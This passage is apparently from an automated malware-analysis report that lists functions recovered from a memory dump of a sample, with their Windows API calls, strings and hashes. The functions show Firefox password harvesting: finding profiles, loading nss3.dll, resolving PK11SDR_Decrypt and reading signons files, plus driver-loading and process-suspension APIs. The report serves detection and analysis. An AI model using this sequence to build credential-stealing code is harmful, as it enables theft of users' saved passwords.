Instruction Fuzzy Hash: 8C517E35500308BBDB22AF64DC45E6E7BB5FB04742F104A7AF952A66F0C774AE50EB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040F767, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 0040F7AC
GetDlgItem.USER32 ref: 0040F7C4
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F7E2
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0040F7EE
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0040F7F6
memset.MSVCRT ref: 0040F81D
memset.MSVCRT ref: 0040F83F
memset.MSVCRT ref: 0040F858
memset.MSVCRT ref: 0040F86C
memset.MSVCRT ref: 0040F886
memset.MSVCRT ref: 0040F89B
GetCurrentProcess.KERNEL32 ref: 0040F8A3
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F8C6
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F8F8
memset.MSVCRT ref: 0040F94B
GetCurrentProcessId.KERNEL32 ref: 0040F959
memcpy.MSVCRT ref: 0040F987
wcscpy.MSVCRT ref: 0040F9AA
_snwprintf.MSVCRT ref: 0040FA19
SetDlgItemTextW.USER32 ref: 0040FA31
GetDlgItem.USER32 ref: 0040FA3B
SetFocus.USER32(00000000), ref: 0040FA42

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040FA0E
{Unknown}, xrefs: 0040F831

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
Instruction ID: 69e9f0bde0ef3093fe47e3bafb281a214b560c7f74f151c34d98b156b899ddfd
Opcode Fuzzy Hash: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
Instruction Fuzzy Hash: F7719FB680121DBEEF219B50DC45EDA7B6CEF08355F0000B6F508A21A1DA799E88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAFF, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FB20
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
memset.MSVCRT ref: 0040FB90
wcslen.MSVCRT ref: 0040FB9D
wcslen.MSVCRT ref: 0040FBAC
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040FC6B
GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040FC77

Part of subcall function 0040648C: memset.MSVCRT ref: 004064AD
Part of subcall function 0040648C: memset.MSVCRT ref: 004064FA
Part of subcall function 0040648C: RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
Part of subcall function 0040648C: wcscpy.MSVCRT ref: 00406642
Part of subcall function 0040648C: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
Part of subcall function 0040648C: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695

Strings

PK11_FreeSlot, xrefs: 0040FC49
NSS_Shutdown, xrefs: 0040FC31
PK11_GetInternalKeySlot, xrefs: 0040FC3D
PK11_CheckUserPassword, xrefs: 0040FC55
nss3.dll, xrefs: 0040FB98, 0040FBC0
NSS_Init, xrefs: 0040FC28
PK11_Authenticate, xrefs: 0040FC61
PK11SDR_Decrypt, xrefs: 0040FC6D

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 2554026968-4029219660
Opcode ID: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
Instruction ID: eeb2f36212a21d3aa086fe7dd3a0485c0e35c5a93e030d286215ed8b11f998db
Opcode Fuzzy Hash: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
Instruction Fuzzy Hash: 15418371940309ABEB209F61CC85E9AB7F8BF58744F10087EE58593191EBB999848F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4F7, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 171COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F51A
wcslen.MSVCRT ref: 0040F522
wcslen.MSVCRT ref: 0040F52E
wcscpy.MSVCRT ref: 0040F5A5
wcscpy.MSVCRT ref: 0040F5B6
memset.MSVCRT ref: 0040F5CF
memset.MSVCRT ref: 0040F5E4
_snwprintf.MSVCRT ref: 0040F5FE
memset.MSVCRT ref: 0040F63D
wcslen.MSVCRT ref: 0040F64D
wcslen.MSVCRT ref: 0040F65B
wcscpy.MSVCRT ref: 0040F611

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

wcscpy.MSVCRT ref: 0040F6A2
memset.MSVCRT ref: 0040F6D1
memset.MSVCRT ref: 0040F6E6
_snwprintf.MSVCRT ref: 0040F702
wcscpy.MSVCRT ref: 0040F715

Strings

General, xrefs: 0040F5B0
IsRelative, xrefs: 0040F745
Path, xrefs: 0040F72A
profiles.ini, xrefs: 0040F527, 0040F543
Profile%d, xrefs: 0040F5EA, 0040F6F4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
String ID: General$IsRelative$Path$Profile%d$profiles.ini
API String ID: 3014334669-2600475665
Opcode ID: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
Instruction ID: ca42eae1a8a54deb15ae60d9a008fbbac9316f2c57223d03809256618168ca92
Opcode Fuzzy Hash: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
Instruction Fuzzy Hash: F151627290021CBADB20EB55CD45ECEB7BCAF14744F5044B7B10DA2091EB789B888F6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1D0, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 254windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A2C8: LoadMenuW.USER32 ref: 0040A2D0

SetMenu.USER32(?,00000000), ref: 0040D2E0
CreateStatusWindowW.COMCTL32(50000000,Function_000434FC,?,00000101), ref: 0040D2FB
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040D313
GetModuleHandleW.KERNEL32(00000000), ref: 0040D322
LoadImageW.USER32 ref: 0040D32F
CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040D359
GetModuleHandleW.KERNEL32(00000000), ref: 0040D366
CreateWindowExW.USER32 ref: 0040D38D
GetFileAttributesW.KERNEL32(004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D468
GetTempPathW.KERNEL32(00000104,004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D478
wcslen.MSVCRT ref: 0040D47F
wcslen.MSVCRT ref: 0040D48D
RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001,?,00000000,/nosaveload,00000000,00000001), ref: 0040D4DA
SendMessageW.USER32(?,00000404,00000002,?), ref: 0040D515
SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040D528

Part of subcall function 00403A14: wcslen.MSVCRT ref: 00403A31
Part of subcall function 00403A14: SendMessageW.USER32(?,00001061,?,?), ref: 00403A55

Strings

commdlg_FindReplace, xrefs: 0040D4D5
report.html, xrefs: 0040D486, 0040D49E
/nosaveload, xrefs: 0040D412
SysListView32, xrefs: 0040D387

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Message$Send$CreateWindowwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterStatusTempToolbar
String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
API String ID: 1638525581-2103577948
Opcode ID: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
Instruction ID: 7a0d9eec849a31f4480aab016bccc9be6ec6f6c883519ecda8bf5f9757aa8271
Opcode Fuzzy Hash: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
Instruction Fuzzy Hash: D7A1A171500388AFEB11DF68CC89BCA7FA5AF55704F04447DFA486B292C7B59908CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00406DD9, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 222COMMON

Download Yara Rule

APIs

Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB20
Part of subcall function 0040FAFF: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
Part of subcall function 0040FAFF: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB90
Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FB9D
Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FBAC
Part of subcall function 0040FAFF: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F

memset.MSVCRT ref: 00406E17
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
memset.MSVCRT ref: 00406E69
memset.MSVCRT ref: 00406E81
memset.MSVCRT ref: 00406E99
memset.MSVCRT ref: 00406EB1
wcslen.MSVCRT ref: 00406EBC
wcslen.MSVCRT ref: 00406ECA
wcslen.MSVCRT ref: 00406EF9
wcslen.MSVCRT ref: 00406F07
wcslen.MSVCRT ref: 00406F36
wcslen.MSVCRT ref: 00406F44
wcslen.MSVCRT ref: 00406F73
wcslen.MSVCRT ref: 00406F81
SetCurrentDirectoryW.KERNEL32(?), ref: 00407074

Part of subcall function 0040697E: memset.MSVCRT ref: 004069BD
Part of subcall function 0040697E: memset.MSVCRT ref: 00406A3C
Part of subcall function 0040697E: memset.MSVCRT ref: 00406A51

Strings

signons.txt, xrefs: 00406EC3, 00406ED8
signons3.txt, xrefs: 00406F3D, 00406F52
signons2.txt, xrefs: 00406F00, 00406F15
signons.sqlite, xrefs: 00406F7A, 00406F8F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcslen$AddressProc$CurrentDirectory$LibraryLoad$ByteCharHandleModuleMultiWide
String ID: signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 1908949080-2435954524
Opcode ID: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
Instruction ID: 8f96e2222c77d76af5181fd0f533d019f0899d465181413e0b466bd376840954
Opcode Fuzzy Hash: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
Instruction Fuzzy Hash: 8871B07180461AABDB21EF61DC41A9E77BCFF04318F1004AEF909F2181E779AE548F69

Uniqueness

Uniqueness Score: -1.00%

Function 00441C15, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
??2@YAPAXI@Z.MSVCRT ref: 00441C46
GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
_snwprintf.MSVCRT ref: 00441CC6
wcscpy.MSVCRT ref: 00441CF0
??3@YAXPAX@Z.MSVCRT ref: 00441DA0

Strings

%4.4X%4.4X, xrefs: 00441CBB
OriginalFileName, xrefs: 00441D87
FileDescription, xrefs: 00441D09
FileVersion, xrefs: 00441D1E
InternalName, xrefs: 00441D5D
CompanyName, xrefs: 00441D48
ProductVersion, xrefs: 00441D33
040904E4, xrefs: 00441CEA
ProductName, xrefs: 00441CF7
\VarFileInfo\Translation, xrefs: 00441CA0
LegalCopyright, xrefs: 00441D72

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: ec9f1750a971676f8f5b87978c60c05f37f633cf3339783e1382760c10002422
Instruction ID: 5dc843b0b2888ef0cde47c2e58fd974eed7f8edc5a370bbe46a7031584b3d011
Opcode Fuzzy Hash: ec9f1750a971676f8f5b87978c60c05f37f633cf3339783e1382760c10002422
Instruction Fuzzy Hash: 044143B2940618BAE704EFA1EC82DDEB7BCFF08744B400557B505A3151DB78BA85CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C8CF, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C912
memset.MSVCRT ref: 0040C927
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C970
ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C97B
SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
LoadImageW.USER32 ref: 0040C9F8
GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
LoadImageW.USER32 ref: 0040CA15
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
GetSysColor.USER32(0000000F), ref: 0040CA2E
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040CA49
ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040CA59
DeleteObject.GDI32(?), ref: 0040CA65
DeleteObject.GDI32(?), ref: 0040CA6B
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040CA88

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
Instruction ID: 0a3ff62ab3886bf523a191411b010267208ec01492d8cd9208f2635b8a46902f
Opcode Fuzzy Hash: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
Instruction Fuzzy Hash: A541B871640304BFE7209F70CC8AF97B7ACFB09B45F000929F399A51D1C6B5A9408B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040648C, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 173registrytimeCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004064AD

Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A

_wcsnicmp.MSVCRT ref: 00406520
memset.MSVCRT ref: 00406544
memset.MSVCRT ref: 00406560
_snwprintf.MSVCRT ref: 00406580
wcsrchr.MSVCRT ref: 004065A7
CompareFileTime.KERNEL32(?,?,00000000), ref: 004065DA
wcscpy.MSVCRT ref: 004065FC
memset.MSVCRT ref: 004064FA

Part of subcall function 00411BFE: RegEnumKeyExW.ADVAPI32(00000000,0040FB38,0040FB38,?,00000000,00000000,00000000,0040FB38,0040FB38,00000000), ref: 00411C21

RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
wcscpy.MSVCRT ref: 00406642
ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695

Strings

mozilla, xrefs: 0040651A
%programfiles%\Mozilla Firefox, xrefs: 00406654
SOFTWARE\Mozilla, xrefs: 004064C9
%s\bin, xrefs: 0040656F
PathToExe, xrefs: 00406585

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
API String ID: 1094916163-2797892316
Opcode ID: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
Instruction ID: 63e98d9b0590a06fe0611c8d8f76d67a06a86b9579f74a21c863053dc4382b5e
Opcode Fuzzy Hash: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
Instruction Fuzzy Hash: F5515472D00218BAEF20EB61DC45ADFB7BCAF04354F0104A6F905F2191EB799B94CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004125BA, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004125DC
memset.MSVCRT ref: 004125F1
wcscpy.MSVCRT ref: 00412623
_snwprintf.MSVCRT ref: 00412643
wcscat.MSVCRT ref: 00412650
_snwprintf.MSVCRT ref: 0041267F
wcscat.MSVCRT ref: 0041268C
wcscat.MSVCRT ref: 0041269A
wcscat.MSVCRT ref: 004126AC
wcscat.MSVCRT ref: 004126B7
wcscat.MSVCRT ref: 004126C9
wcscat.MSVCRT ref: 004126DB

Strings

<font, xrefs: 0041261D
</font>, xrefs: 004126D5
<b>, xrefs: 004126A6
</b>, xrefs: 004126C3
size="%d", xrefs: 00412632
color="#%s", xrefs: 0041266E

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
Instruction ID: 1bdd15307226dc02cd036ffdab734ce65306a7f25c134a46d7f370f8b7d92746
Opcode Fuzzy Hash: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
Instruction Fuzzy Hash: 2C31E9B2900305BEEB20AA559E82DBF73BCDF41715F60405FF214E21C2DABC9E859A1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC89, Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31

Strings

NtQuerySymbolicLinkObject, xrefs: 0040FCEB
NtResumeProcess, xrefs: 0040FD21
NtSuspendProcess, xrefs: 0040FD0F
NtOpenSymbolicLinkObject, xrefs: 0040FCD9
NtQueryObject, xrefs: 0040FCFD
NtLoadDriver, xrefs: 0040FCB5
NtQuerySystemInformation, xrefs: 0040FCA8
ntdll.dll, xrefs: 0040FC97
NtUnloadDriver, xrefs: 0040FCC7

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
API String ID: 667068680-2887671607
Opcode ID: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
Instruction ID: df14504fdc59ccf6a8c55cbe4aacceea24f9204784c5926a31105bf4aba29bc2
Opcode Fuzzy Hash: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
Instruction Fuzzy Hash: 8E018478D40314BBEB119F71AC09B563EA9F7187967180977F41862272DBB98810EE8C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEB4, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 184COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BED5
memset.MSVCRT ref: 0040BEFF
memset.MSVCRT ref: 0040BF15
memset.MSVCRT ref: 0040BF2B
_snwprintf.MSVCRT ref: 0040BF64
wcscpy.MSVCRT ref: 0040BFAF
_snwprintf.MSVCRT ref: 0040C03C
wcscat.MSVCRT ref: 0040C06E

Part of subcall function 0041248F: _snwprintf.MSVCRT ref: 004124B3

wcscpy.MSVCRT ref: 0040C050
_snwprintf.MSVCRT ref: 0040C0AD

Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192

Strings

<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040BEDD
<font color="%s">%s</font>, xrefs: 0040C02F
</table><p>, xrefs: 0040C0CF
<table border="1" cellpadding="5">, xrefs: 0040BF6C
bgcolor="%s", xrefs: 0040BF56
 , xrefs: 0040C068
nowrap, xrefs: 0040BFA9

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1277802453-601624466
Opcode ID: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
Instruction ID: c023c2c05774347514c90e9c4a79a5fc261e79551634f2018d74b142c4ca0a41
Opcode Fuzzy Hash: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
Instruction Fuzzy Hash: 6B619E31900208EFEF14EF94CC86EAEBB79EF44314F50419AF905AA1D2DB75AA51CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004126E8, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041270E
memset.MSVCRT ref: 00412723
memset.MSVCRT ref: 00412738
_snwprintf.MSVCRT ref: 00412767
_snwprintf.MSVCRT ref: 00412796
wcscpy.MSVCRT ref: 004127A7
_snwprintf.MSVCRT ref: 004127C7
memset.MSVCRT ref: 00412803
_snwprintf.MSVCRT ref: 00412824
_snwprintf.MSVCRT ref: 0041285E

Part of subcall function 0041248F: _snwprintf.MSVCRT ref: 004124B3

Strings

<th%s>%s%s%s, xrefs: 0041284D
width="%s", xrefs: 00412813
</font>, xrefs: 004127A1
<table border="1" cellpadding="5"><tr%s>, xrefs: 004127B6
<font color="%s">, xrefs: 00412785
bgcolor="%s", xrefs: 00412756

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
Instruction ID: df620ac0873104ba588d68bc57a3bc16e82c0a505241d1212890b0a23309d9f4
Opcode Fuzzy Hash: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
Instruction Fuzzy Hash: 03418371D402197AEB20EB55DD41EFB727CFF04304F4401AAB509E2181EB749B948F6A

Uniqueness

Uniqueness Score: -1.00%

Function 004035E2, Relevance: 27.1, APIs: 18, Instructions: 66windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C912
Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C927
Part of subcall function 0040C8CF: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
Part of subcall function 0040C8CF: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040C9F8
Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040CA15
Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
Part of subcall function 0040C8CF: GetSysColor.USER32(0000000F), ref: 0040CA2E

GetModuleHandleW.KERNEL32(00000000), ref: 004035F4
LoadIconW.USER32(00000000,00000072), ref: 004035FF
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403610
GetModuleHandleW.KERNEL32(00000000), ref: 00403614
LoadIconW.USER32(00000000,00000074), ref: 00403619
